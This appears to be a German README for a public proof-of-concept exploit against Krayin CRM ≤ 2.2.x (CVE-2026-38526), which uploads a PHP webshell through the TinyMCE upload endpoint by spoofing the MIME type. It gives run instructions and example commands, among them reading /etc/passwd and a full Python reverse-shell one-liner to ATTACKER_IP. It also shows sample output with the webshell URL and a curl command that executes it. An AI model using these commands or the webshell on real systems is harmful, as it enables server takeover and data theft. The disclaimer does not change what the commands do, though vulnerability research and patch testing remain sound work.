
Automatisierter Exploit für Krayin CRM ≤ 2.2.x.
Automatisierter Exploit für Krayin CRM ≤ 2.2.x. Dieses Skript nutzt eine Schwachstelle durch uneingeschränkten Datei-Upload im TinyMCE-Endpunkt (/admin/tinymce/upload) aus, umgeht die MIME-Typ-Validierung durch Vortäuschen von image/jpeg, lädt eine PHP-Webshell hoch und führt beliebige Befehle mit den Rechten des Webservers aus.
| Eigenschaft | Wert |
|---|
| CVE-ID | CVE-2026-38526 |
| Betroffene Software | Krayin CRM ≤ 2.2.x |
| Schwachstellentyp | Uneingeschränkter Datei-Upload → Remotecodeausführung |
| Authentifizierung | Erforderlich (jedes gültige Administratorkonto) |
| Endpunkt | POST /admin/tinymce/upload |
requests-Bibliothekgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
| Flag | Beschreibung | Beispiel |
|---|---|---|
-i | Ziel-URL (mit oder ohne http://) | http://target.com oder target.com |
-u | Admin-E-Mail/Benutzername | [email protected] |
-p | Admin-Passwort | AdminPassword123! |
-c | Auszuführender Befehl (Standard: id) | whoami |
# Grundprüfung
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Benutzerdefinierter Befehl
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse Shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload hochladen[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Authentifizierung fehlgeschlagen: Überprüfen Sie, ob die Anmeldedaten korrekt sind und das Konto auf dem Zielsystem existiert.
CSRF-Token-Extraktion fehlgeschlagen: Stellen Sie sicher, dass das Zielsystem eine verwundbare Krayin-CRM-Version ausführt und der Login-Endpunkt erreichbar ist.
Reverse Shell stellt keine Verbindung her: Stellen Sie sicher, dass Ihr Listener läuft (nc -lvnp <PORT>), Firewall-Regeln ausgehende Verbindungen erlauben und die IP-/Port-Angaben im Payload korrekt sind.
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Benutzer sind allein dafür verantwortlich, dass sie vor dem Testen eines Zielsystems über die entsprechende Autorisierung verfügen. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
b0nyo - PoC-Implementierung
TREXNEGRO - Entdeckung der Schwachstelle